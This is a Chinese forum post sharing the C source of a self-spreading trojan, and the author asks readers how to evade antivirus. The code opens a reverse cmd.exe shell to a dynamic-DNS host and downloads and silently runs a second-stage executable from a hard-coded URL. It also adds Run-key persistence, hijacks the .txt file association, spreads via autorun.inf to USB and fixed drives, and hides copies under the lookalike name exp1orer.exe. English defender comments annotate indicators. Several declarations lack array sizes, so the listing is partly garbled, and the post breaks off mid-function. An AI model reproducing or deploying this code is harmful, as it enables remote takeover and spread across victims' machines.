C感染型木马
以前总是看汇编病毒,汇编病毒处理复杂的PE文件结构是如鱼得水,但是编写其他的各种功能就有点不那么尽如人意了,所以试着用C语言写了一个感染型木马,希望各位大侠们指点一二。包括感染磁盘,感染U盘,写入autorun.inf,自动从网上下载病毒,病毒有两个线程,一个线程运行反弹木马,一个线程感染磁盘U盘,把U盘里的所有可执行文件隐藏,同时把名字后加一个空格,把病毒替换为原文件名,病毒会自动释放一个Noteped.exe,同时把文件关联修改成noteped.exe,该文件先运行txt文件,然后运行病毒,所以只要打开txt文件就会重新运行病毒,病毒运用的手段都是常规手段,所以会被杀毒软件报毒,希望各位大侠给点免杀手段,废话不多说了,直接上代码。。/* ////////////////////////////////////////////////////////////////////////////////
* 摘 要:c语言反弹连接型感染型木马,附带U盘感染,磁盘感染,自动下载功能。
* 作 者:H•Y•H
/////////////////////////////////////////////////////////////////////////////// */
#include <string.h>
#include <Winsock2.h>
#include <stdio.h>
#include <Wininet.h>
#pragma warning(disable:4309)
#pragma warning(disable:4305)
#pragma comment(linker,"/subsystem:windows")
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"wininet.lib")
// Command-and-control endpoint used by Trojan(): a dynamic-DNS host name and a
// fixed port. Network indicator: outbound TCP from this process to this
// name/port (see the connect loop in Trojan()).
#define MyAddr "h158678667.3322.org"
#define MyPort 8081
// Full path of the running executable, filled in by WinMain() through
// GetModuleFileName() and used as the copy source by HideFile(), Infect(),
// InfectDisk() and InfectU().
char localfile;
// Forward declarations; the definitions follow WinMain() below.
DWORD WINAPI Trojan(LPVOID lpParameter);      // reverse-shell thread
DWORD WINAPI Infect(LPVOID lpParameter);      // drive / removable-media spreading thread
bool FileExists(char *filename);              // FindFirstFile-based existence test
void RegWrite();                              // registry persistence and association hijack
void HideFile();                              // self-copy into system directories, hidden
bool WriteInf(char *infname);                 // autorun.inf writer
bool WriteVbs(char *vbsname);                 // system.vbs writer
void InfectDisk(char *drive);                 // per-drive artifact dropper
void ReleaseNoteped();                        // writes the embedded node[] image to disk
bool InfectU(char *UDiskName);                // executable replacement on removable media
char *left(char *dst,char *src, int n);       // first-n-characters string helper
BOOL DownLoadFile(char *url,char *filename);  // WinINet HTTP downloader
//请童鞋们不要害怕这个大大的数组,它只是一个exe文件(源代码见下面红色代码)的十六进制形式,直接从C32Asm里面复制就行,可略过不看。。
// Embedded PE image that ReleaseNoteped() writes verbatim to
// <windows dir>\noteped.exe. The bytes carry the usual MZ/"This program
// cannot be run in DOS mode" header, an import table naming KERNEL32.dll
// (WinExec, WideCharToMultiByte, lstrcatA, lstrcpyA, GetSystemDirectoryA,
// GetWindowsDirectoryA, GetCommandLineW, FindFirstFileA) and SHELL32.dll
// (CommandLineToArgvW), and the strings "exp1orer.exe" and "\notepad.exe" --
// matching the second source listing on this page.
// Defender note: because the dropped file is this constant blob, its hash
// (computed from the file on disk) is a stable indicator for the helper.
char node[]={0x4D,0x5A,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xFF,0xFF,0x00,0x00,0xB8,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0xC8,0x00,0x00,0x00,0x0E,0x1F,0xBA,0x0E,0x00,0xB4,0x09,0xCD,0x21,0xB8,\
0x01,0x4C,0xCD,0x21,0x54,0x68,0x69,0x73,0x20,0x70,0x72,0x6F,0x67,0x72,0x61,0x6D,0x20,0x63,0x61,\
0x6E,0x6E,0x6F,0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6E,0x20,0x69,0x6E,0x20,0x44,0x4F,0x53,0x20,\
0x6D,0x6F,0x64,0x65,0x2E,0x0D,0x0D,0x0A,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x73,0xF8,0x8B,\
0xDF,0x37,0x99,0xE5,0x8C,0x37,0x99,0xE5,0x8C,0x37,0x99,0xE5,0x8C,0xB4,0x85,0xEB,0x8C,0x36,0x99,\
0xE5,0x8C,0x37,0x99,0xE4,0x8C,0x3E,0x99,0xE5,0x8C,0x55,0x86,0xF6,0x8C,0x32,0x99,0xE5,0x8C,0xDF,\
0x86,0xEE,0x8C,0x36,0x99,0xE5,0x8C,0x52,0x69,0x63,0x68,0x37,0x99,0xE5,0x8C,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x45,0x00,0x00,0x4C,0x01,0x01,\
0x00,0x69,0x97,0xC6,0x4D,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xE0,0x00,0x0F,0x01,0x0B,0x01,\
0x06,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x10,0x00,0x00,0x00,\
0x10,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00,\
0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,\
0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,\
0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xA8,0x12,0x00,0x00,0x3C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x10,0x00,0x00,0x2C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2E,0x74,0x65,0x78,0x74,0x00,\
0x00,0x00,0xCA,0x03,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x02,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x60,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x10,0x13,0x00,0x00,0x1A,0x13,0x00,0x00,0x30,0x13,0x00,0x00,0x3C,0x13,0x00,0x00,0x48,0x13,\
0x00,0x00,0x5E,0x13,0x00,0x00,0x76,0x13,0x00,0x00,0x88,0x13,0x00,0x00,0x00,0x00,0x00,0x00,0xA8,\
0x13,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x65,0x78,0x70,0x31,0x6F,0x72,0x65,0x72,\
0x2E,0x65,0x78,0x65,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x5C,0x65,0x78,0x70,0x31,0x6F,0x72,\
0x65,0x72,0x2E,0x65,0x78,0x65,0x00,0x00,0x00,0x5C,0x6E,0x6F,0x74,0x65,0x70,0x61,0x64,0x2E,0x65,\
0x78,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x55,\
0x8B,0xEC,0x81,0xEC,0x20,0x05,0x00,0x00,0x53,0x56,0x8D,0x45,0xF4,0x57,0x33,0xDB,0x50,0x89,0x5D,\
0xF4,0xFF,0x15,0x18,0x10,0x40,0x00,0x50,0xFF,0x15,0x24,0x10,0x40,0x00,0xBE,0x04,0x01,0x00,0x00,\
0x89,0x45,0xFC,0x56,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x53,0x50,0xE8,0xA8,0x01,0x00,0x00,0x56,0x8D,\
0x85,0xF0,0xFE,0xFF,0xFF,0x53,0x50,0xE8,0x9A,0x01,0x00,0x00,0x56,0x8D,0x85,0xE4,0xFB,0xFF,0xFF,\
0x53,0x50,0xE8,0x8C,0x01,0x00,0x00,0x56,0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x53,0x50,0xE8,0x7E,0x01,\
0x00,0x00,0x56,0x8D,0x85,0xE0,0xFA,0xFF,0xFF,0x53,0x50,0xE8,0x70,0x01,0x00,0x00,0x83,0xC4,0x3C,\
0x8D,0x85,0xF0,0xFE,0xFF,0xFF,0x56,0x50,0xFF,0x15,0x14,0x10,0x40,0x00,0x8D,0x85,0xE4,0xFB,0xFF,\
0xFF,0x56,0x50,0xFF,0x15,0x10,0x10,0x40,0x00,0x8B,0x3D,0x0C,0x10,0x40,0x00,0x8D,0x85,0xF0,0xFE,\
0xFF,0xFF,0x50,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x50,0xFF,0xD7,0x8D,0x85,0xF0,0xFE,0xFF,0xFF,0x50,\
0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x50,0xFF,0xD7,0x8B,0x3D,0x08,0x10,0x40,0x00,0x8D,0x85,0xE8,0xFC,\
0xFF,0xFF,0x68,0x54,0x10,0x40,0x00,0x50,0xFF,0xD7,0x8D,0x85,0xF0,0xFE,0xFF,0xFF,0x68,0x44,0x10,\
0x40,0x00,0x50,0xFF,0xD7,0x8D,0x85,0xE4,0xFB,0xFF,0xFF,0x68,0x44,0x10,0x40,0x00,0x50,0xFF,0xD7,\
0x6A,0x01,0x58,0x39,0x45,0xF4,0x89,0x45,0xF8,0x7E,0x50,0x8B,0x45,0xFC,0x83,0xC0,0x04,0x89,0x45,\
0xFC,0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x68,0x40,0x10,0x40,0x00,0x50,0xFF,0xD7,0x53,0x53,0x8D,0x85,\
0xE0,0xFA,0xFF,0xFF,0x56,0x50,0x8B,0x45,0xFC,0x6A,0xFF,0xFF,0x30,0x53,0x6A,0x01,0xFF,0x15,0x04,\
0x10,0x40,0x00,0x8D,0x85,0xE0,0xFA,0xFF,0xFF,0x50,0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x50,0xFF,0xD7,\
0xFF,0x45,0xF8,0x83,0x45,0xFC,0x04,0x8B,0x45,0xF8,0x3B,0x45,0xF4,0x7C,0xB9,0x8B,0x35,0x00,0x10,\
0x40,0x00,0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x6A,0x05,0x50,0xFF,0xD6,0x8D,0x85,0xF0,0xFE,0xFF,0xFF,\
0x50,0xE8,0x60,0x00,0x00,0x00,0x84,0xC0,0x59,0x74,0x09,0x53,0x8D,0x85,0xF0,0xFE,0xFF,0xFF,0xEB,\
0x46,0x8D,0x85,0xE4,0xFB,0xFF,0xFF,0x50,0xE8,0x46,0x00,0x00,0x00,0x84,0xC0,0x59,0x74,0x09,0x53,\
0x8D,0x85,0xE4,0xFB,0xFF,0xFF,0xEB,0x2C,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x68,0x30,0x10,0x40,0x00,\
0x50,0x88,0x9D,0xEF,0xFD,0xFF,0xFF,0xFF,0xD7,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x50,0xE8,0x18,0x00,\
0x00,0x00,0x84,0xC0,0x59,0x74,0x0A,0x53,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x50,0xFF,0xD6,0x5F,0x5E,\
0x33,0xC0,0x5B,0xC9,0xC2,0x10,0x00,0x55,0x8B,0xEC,0x81,0xEC,0x40,0x01,0x00,0x00,0x8D,0x85,0xC0,\
0xFE,0xFF,0xFF,0x50,0xFF,0x75,0x08,0xFF,0x15,0x1C,0x10,0x40,0x00,0x83,0xF8,0xFF,0x0F,0x95,0xC0,\
0xC9,0xC3,0xCC,0xCC,0x8B,0x54,0x24,0x0C,0x8B,0x4C,0x24,0x04,0x85,0xD2,0x74,0x47,0x33,0xC0,0x8A,\
0x44,0x24,0x08,0x57,0x8B,0xF9,0x83,0xFA,0x04,0x72,0x2D,0xF7,0xD9,0x83,0xE1,0x03,0x74,0x08,0x2B,\
0xD1,0x88,0x07,0x47,0x49,0x75,0xFA,0x8B,0xC8,0xC1,0xE0,0x08,0x03,0xC1,0x8B,0xC8,0xC1,0xE0,0x10,\
0x03,0xC1,0x8B,0xCA,0x83,0xE2,0x03,0xC1,0xE9,0x02,0x74,0x06,0xF3,0xAB,0x85,0xD2,0x74,0x06,0x88,\
0x07,0x47,0x4A,0x75,0xFA,0x8B,0x44,0x24,0x08,0x5F,0xC3,0x8B,0x44,0x24,0x04,0xC3,0xE4,0x12,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x9A,0x13,0x00,0x00,0x00,0x10,0x00,0x00,0x08,0x13,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xBE,0x13,0x00,0x00,0x24,0x10,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x10,0x13,0x00,0x00,0x1A,0x13,0x00,0x00,0x30,0x13,0x00,0x00,0x3C,0x13,0x00,0x00,0x48,0x13,0x00,\
0x00,0x5E,0x13,0x00,0x00,0x76,0x13,0x00,0x00,0x88,0x13,0x00,0x00,0x00,0x00,0x00,0x00,0xA8,0x13,\
0x00,0x00,0x00,0x00,0x00,0x00,0xD3,0x02,0x57,0x69,0x6E,0x45,0x78,0x65,0x63,0x00,0xD2,0x02,0x57,\
0x69,0x64,0x65,0x43,0x68,0x61,0x72,0x54,0x6F,0x4D,0x75,0x6C,0x74,0x69,0x42,0x79,0x74,0x65,0x00,\
0xF9,0x02,0x6C,0x73,0x74,0x72,0x63,0x61,0x74,0x41,0x00,0x00,0x02,0x03,0x6C,0x73,0x74,0x72,0x63,\
0x70,0x79,0x41,0x00,0x00,0x59,0x01,0x47,0x65,0x74,0x53,0x79,0x73,0x74,0x65,0x6D,0x44,0x69,0x72,\
0x65,0x63,0x74,0x6F,0x72,0x79,0x41,0x00,0x7D,0x01,0x47,0x65,0x74,0x57,0x69,0x6E,0x64,0x6F,0x77,\
0x73,0x44,0x69,0x72,0x65,0x63,0x74,0x6F,0x72,0x79,0x41,0x00,0x00,0xCB,0x00,0x47,0x65,0x74,0x43,\
0x6F,0x6D,0x6D,0x61,0x6E,0x64,0x4C,0x69,0x6E,0x65,0x57,0x00,0x94,0x00,0x46,0x69,0x6E,0x64,0x46,\
0x69,0x72,0x73,0x74,0x46,0x69,0x6C,0x65,0x41,0x00,0x00,0x4B,0x45,0x52,0x4E,0x45,0x4C,0x33,0x32,\
0x2E,0x64,0x6C,0x6C,0x00,0x00,0x02,0x00,0x43,0x6F,0x6D,0x6D,0x61,0x6E,0x64,0x4C,0x69,0x6E,0x65,\
0x54,0x6F,0x41,0x72,0x67,0x76,0x57,0x00,0x00,0x53,0x48,0x45,0x4C,0x4C,0x33,0x32,0x2E,0x64,0x6C,\
0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,PSTR szCmdLine,int iCmdShow)
{
    // Entry point of the dropper. Order of operations as written:
    // single-instance mutex, record own path, start the reverse-shell and
    // spreading threads, fetch and launch a second-stage binary, then loop
    // re-applying the file copies and registry changes every 5 minutes.
    // Defender notes: the named mutex "HYH", a hidden+system file at
    // c:\Program Files\a.exe, and an HTTP request to the hard-coded URL below
    // are the host and network artifacts this function produces.

    // Create a named mutex so the process cannot be started more than once.
    HANDLE hMutex=CreateMutex(NULL,FALSE,"HYH");
    if(hMutex==NULL)
        ExitProcess(0);
    if(GetLastError()==ERROR_ALREADY_EXISTS)
        ExitProcess(0);
    // localfile (global) is the copy source for every infection routine.
    memset(localfile,0,MAX_PATH);
    GetModuleFileName(NULL,localfile,MAX_PATH);
    // Two worker threads: Trojan() (reverse shell) and Infect() (drive
    // enumeration and self-copy). Neither handle is closed or waited on.
    HANDLE hTrojan=CreateThread(NULL,NULL,Trojan,NULL,NULL,NULL);
    HANDLE infect=CreateThread(NULL,NULL,Infect,NULL,NULL,NULL);
    // Second stage: downloaded only if the target path is absent, then
    // hidden; WinExec runs it hidden on every start whether or not the
    // download succeeded (DownLoadFile's result is not checked).
    char url="http://www.ku6tvb.com/Sx_server.exe";
    if(!FileExists("c:\\Program Files\\a.exe"))
    {
        DownLoadFile(url,"c:\\Program Files\\a.exe");
        SetFileAttributes("c:\\Program Files\\a.exe",FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
    }
    WinExec("c:\\Program Files\\a.exe",SW_HIDE);
    // Persistence loop: re-copy self and rewrite the registry every 300 s,
    // so manual cleanup is undone unless the process is stopped first.
    while(true)
    {
        HideFile();
        RegWrite();
        Sleep(300000);
    }
    return 0;
}
//反弹木马线程,该线程利用TCP套接字连接nc服务端,把客户端机器的cmd反弹给服务端。。。
DWORD WINAPI Trojan(LPVOID lpParameter)
{
    // Reverse-shell thread. Once InternetGetConnectedState reports a
    // connection it resolves MyAddr, connects to MyAddr:MyPort over TCP and
    // starts cmd.exe with stdin, stdout and stderr all set to that socket,
    // so whoever listens on the remote side gets an interactive shell. When
    // the shell exits the handles are closed and the outer for(;;) reconnects.
    // Defender notes: outbound TCP to the dynamic-DNS name in MyAddr on
    // port MyPort is the network indicator; on the host, a cmd.exe child of
    // this process whose standard handles are a socket is the process-tree
    // indicator. Egress filtering on that port and alerting on cmd.exe
    // launched with inherited socket handles both break this loop.
    // The try/catch(...) below makes this translation unit C++ (MSVC), not C.
    LPHOSTENT HostEnts;
    SOCKADDR_IN SockAddrIn;
    SOCKET HSocket;
    DWORD *lpdwflags=NULL;
    int status;
    char szCMDPath;
    STARTUPINFO StartupInfo;
    WSADATA WSADa;
    PROCESS_INFORMATION ProcessInfo;
    // Full path of cmd.exe under the system directory.
    GetSystemDirectory(szCMDPath,MAX_PATH);
    strcat(szCMDPath,"\\cmd.exe");
    for(;;)
    {
        // Catch-all keeps the thread alive; whether it also catches a fault
        // from dereferencing a NULL gethostbyname() result depends on the
        // compiler's exception-handling mode -- not verifiable from here.
        try
        {
            // Poll every 10 s until the system reports an Internet connection.
            while(!InternetGetConnectedState(lpdwflags,0))
                Sleep(10000);
            status=0;
            ZeroMemory(&ProcessInfo,sizeof(PROCESS_INFORMATION));
            ZeroMemory(&StartupInfo,sizeof(STARTUPINFO));
            ZeroMemory(&WSADa,sizeof(WSADATA));
            WSAStartup(MAKEWORD(1,1),&WSADa);
            // DNS lookup of the C2 name; the first returned address is used
            // without checking for a NULL result.
            HostEnts=gethostbyname(MyAddr);
            SockAddrIn.sin_addr=*((LPIN_ADDR)*HostEnts->h_addr_list);
            SockAddrIn.sin_family=AF_INET;
            SockAddrIn.sin_port=htons(MyPort);
            HSocket=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
            // Retry with no delay: a closed or filtered port turns this into a
            // tight connect() loop, which is itself conspicuous in flow logs.
            do{
                status=connect(HSocket,(SOCKADDR *)&SockAddrIn,sizeof(SockAddrIn));
            }while(status==SOCKET_ERROR);
            // The socket is inherited by cmd.exe as all three standard handles
            // (bInheritHandles=TRUE in the CreateProcess call).
            StartupInfo.cb=sizeof(STARTUPINFO);
            StartupInfo.wShowWindow=SW_HIDE;
            StartupInfo.dwFlags=STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
            StartupInfo.hStdError=(HANDLE)HSocket;
            StartupInfo.hStdOutput=(HANDLE)HSocket;
            StartupInfo.hStdInput=(HANDLE)HSocket;
            CreateProcess(NULL,szCMDPath,NULL,NULL,TRUE,0,NULL,NULL,&StartupInfo,&ProcessInfo);
            // Block until the shell exits. The second wait is redundant: the
            // process is already signalled, so it returns immediately.
            WaitForSingleObject(ProcessInfo.hProcess,INFINITE);
            if (WAIT_OBJECT_0==WaitForSingleObject(ProcessInfo.hProcess,INFINITE))
            {
                CloseHandle(ProcessInfo.hProcess);
                CloseHandle(ProcessInfo.hThread);
                closesocket(HSocket);
                WSACleanup();
            }
        }
        catch(...)
        {
            continue;
        }
    }
}
//感染线程,感染系统磁盘和U盘,这里需要掌握的是驱动器盘符的获取有关的API函数及用法
DWORD WINAPI Infect(LPVOID lpParameter)
{
    // Spreading thread. Every 10 s it enumerates drive roots with
    // GetLogicalDriveStrings(); removable drives other than A:\ get
    // InfectDisk() (autorun.inf + system.vbs + hidden copy) and InfectU()
    // (executable replacement), fixed drives get InfectDisk() only. After the
    // drive pass it copies itself to <windows>\exp1orer.exe,
    // <system>\exp1orer.exe and a relative "Program Files\exp1orer.exe",
    // and re-drops <windows>\noteped.exe if it is missing.
    // Defender notes: autorun.inf, system.vbs and a hidden exp1orer.exe at a
    // drive root are the propagation artifacts; disabling AutoRun and
    // write-protecting removable media cut this path.
    char Drives;
    int Type;
    char *pDrive;
    char systempath;
    char windowspath;
    memset(systempath,0,MAX_PATH);
    memset(windowspath,0,MAX_PATH);
    GetWindowsDirectory(windowspath,MAX_PATH);
    GetSystemDirectory(systempath,MAX_PATH);
    while(true)
    {
        memset(Drives,0,sizeof(Drives));
        pDrive=Drives;
        // Drives receives root strings such as "C:\" back to back, each one
        // 4 bytes including its NUL -- hence the pDrive+=4 steps below.
        GetLogicalDriveStrings(sizeof(Drives),Drives);
        for(;pDrive!=NULL;)
        {
            Type=GetDriveType(pDrive);
            switch(Type)
            {
            case DRIVE_REMOVABLE:
                // The floppy root A:\ is skipped; USB sticks report DRIVE_REMOVABLE.
                if(strcmp(pDrive,"A:\\")==0)
                {
                    pDrive+=4;
                    continue;
                }
                else
                {
                    InfectDisk(pDrive);
                    InfectU(pDrive);
                    pDrive+=4;continue;
                }
            case DRIVE_FIXED:InfectDisk(pDrive);
                pDrive+=4;continue;
            default:pDrive+=4;continue;
            }
        }
        // Self-copies use bFailIfExists=TRUE, so existing copies are never
        // overwritten; the "Program Files" path is relative to the current
        // directory, not an absolute path.
        strcat(windowspath,"\\exp1orer.exe");
        CopyFile(localfile,windowspath,TRUE);
        strcat(systempath,"\\exp1orer.exe");
        CopyFile(localfile,systempath,TRUE);
        systempath='\0';
        strcat(systempath,"Program Files\\exp1orer.exe");
        CopyFile(localfile,systempath,TRUE);
        memset(windowspath,0,MAX_PATH);
        GetWindowsDirectory(windowspath,MAX_PATH);
        strcat(windowspath,"\\noteped.exe");
        // Re-drop the .txt association helper if it has been removed.
        if(!FileExists(windowspath))
            ReleaseNoteped();
        Sleep(10000);
    }
}
//修改相应注册表文件,了解常用注册表API函数的用法就行了。。
void RegWrite()
{
    // Rewrites the registry values below. Called from WinMain()'s 5-minute
    // loop, so each change is re-applied while the process runs.
    // Defender notes: every key touched here is a standard monitoring point
    // (HKLM Run/RunOnce persistence, the txtfile open-command hijack,
    // NoDriveTypeAutoRun, and the Explorer hidden-file toggles). None of the
    // keys opened through RegCreateKey is ever released with RegCloseKey.
    HKEY hKey;
    DWORD value;
    char filepath;
    memset(filepath,0,MAX_PATH);
    GetWindowsDirectory(filepath,MAX_PATH);
    strcat(filepath,"\\exp1orer.exe");
    // Change the IE home page.
    RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Internet Explorer\\Main",&hKey);
    RegSetValueEx(hKey,"Start Page",0,REG_SZ,(BYTE *)"www.gov.cn",lstrlen("www.gov.cn"));
    // Add self to the startup entries. The value name "exp1orer" is written
    // three times: RunOnce with <windows>\exp1orer.exe, RunOnce again with the
    // relative "Program Files\exp1orer.exe" (overwriting the first), then Run
    // with the bare name "exp1orer.exe", which is resolved through the normal
    // executable search order at logon.
    RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce",&hKey);
    RegSetValueEx(hKey,"exp1orer",0,REG_SZ,(BYTE *)filepath,lstrlen(filepath));
    filepath='\0';
    strcat(filepath,"Program Files\\exp1orer.exe");
    RegSetValueEx(hKey,"exp1orer",0,REG_SZ,(BYTE *)filepath,lstrlen(filepath));
    filepath='\0';
    strcat(filepath,"exp1orer.exe");
    RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
    RegSetValueEx(hKey,"exp1orer",0,REG_SZ,(BYTE *)filepath,lstrlen(filepath));
    memset(filepath,0,MAX_PATH);
    GetWindowsDirectory(filepath,MAX_PATH);
    strcat(filepath,"\\noteped.exe %1");
    // Change the .txt file association: opening any text file now runs
    // <windows>\noteped.exe with the document path as its argument.
    RegCreateKey(HKEY_CLASSES_ROOT,"txtfile\\shell\\open\\command",&hKey);
    RegSetValueEx(hKey,"",0,REG_SZ,(BYTE *)filepath,lstrlen(filepath));
    // NoDriveTypeAutoRun = 243 (0xF3). In this bitmask each set bit disables
    // AutoRun for the drive type with that number; 0xF3 leaves the bits for
    // DRIVE_REMOVABLE (2) and DRIVE_FIXED (3) clear, i.e. AutoRun remains
    // enabled exactly where autorun.inf is planted -- confirm against the
    // platform documentation for the target Windows version.
    value=243;
    RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",&hKey);
    RegSetValueEx(hKey,"NoDriveTypeAutoRun",0,REG_DWORD,(BYTE *)&value,sizeof(DWORD));
    // Make "Show hidden files" ineffective so the hidden+system copies stay
    // invisible in Explorer.
    value=0;
    RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL",&hKey);
    RegSetValueEx(hKey,"CheckedValue",0,REG_DWORD,(BYTE *)&value,sizeof(DWORD));
    value=2;
    RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN",&hKey);
    // Note: the Reserved argument is passed as 3 here rather than 0.
    RegSetValueEx(hKey,"CheckedValue",3,REG_DWORD,(BYTE *)&value,sizeof(DWORD));
}
//把病毒副本复制到系统目录,windows目录并设置程隐藏
void HideFile()
{
    // Drops copies of the running binary (localfile) as exp1orer.exe into the
    // system directory, the Windows directory and a relative
    // "Program Files\exp1orer.exe", and marks each hidden+system. CopyFile is
    // called with bFailIfExists=TRUE, so a file already present at any of
    // these paths is left untouched and only the attributes are reapplied.
    // Defender notes: "exp1orer.exe" (digit 1 in place of l) is a lookalike of
    // explorer.exe; a hidden+system file of that name in the Windows or
    // System directory is a direct host indicator.
    char newfile;
    memset(newfile,0,MAX_PATH);
    GetSystemDirectory(newfile,MAX_PATH);
    strcat(newfile,"\\exp1orer.exe");
    CopyFile(localfile,newfile,TRUE);
    SetFileAttributes(newfile,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
    memset(newfile,0,MAX_PATH);
    GetWindowsDirectory(newfile,MAX_PATH);
    strcat(newfile,"\\exp1orer.exe");
    CopyFile(localfile,newfile,TRUE);
    SetFileAttributes(newfile,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
    // Third copy: a path relative to the current directory.
    newfile='\0';
    strcat(newfile,"Program Files\\exp1orer.exe");
    CopyFile(localfile,newfile,TRUE);
    SetFileAttributes(newfile,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
}
//写入autorun.inf文件,使磁盘和U盘自动运行
bool WriteInf(char *infname)
{
    // Writes an autorun.inf whose open verb, explore verb and default action
    // all run "wscript.exe system.vbs" (the script WriteVbs() drops beside
    // it); the Chinese menu labels are "Open(&O)" and "Explorer(&X)". The
    // file is then marked hidden+system.
    // Defender notes: an autorun.inf + system.vbs pair at a drive root is the
    // on-media indicator. Windows builds updated after 2011 ignore
    // autorun.inf on non-optical removable media regardless of the
    // NoDriveTypeAutoRun value, so this vector only works on older or
    // unpatched hosts -- confirm for the platform in question.
    // @param infname full path of the file to write.
    // @return FALSE if the file cannot be opened, TRUE otherwise. The
    //         fwrite and fclose results are not checked.
    char autorun="\nopen=wscript.exe system.vbs\nshell\\open\\打开(&O)\nshell\\open\\Command=wscript.exe system.vbs\nshell\\open\\default=1\nshell\\explore\\资源管理器(&X)\nshell\\explore\\Command=wscript.exe system.vbs";
    FILE *fp;
    fp=fopen(infname,"w+");
    if(fp==NULL)
        return FALSE;
    fwrite(autorun,sizeof(char),lstrlen(autorun),fp);
    fclose(fp);
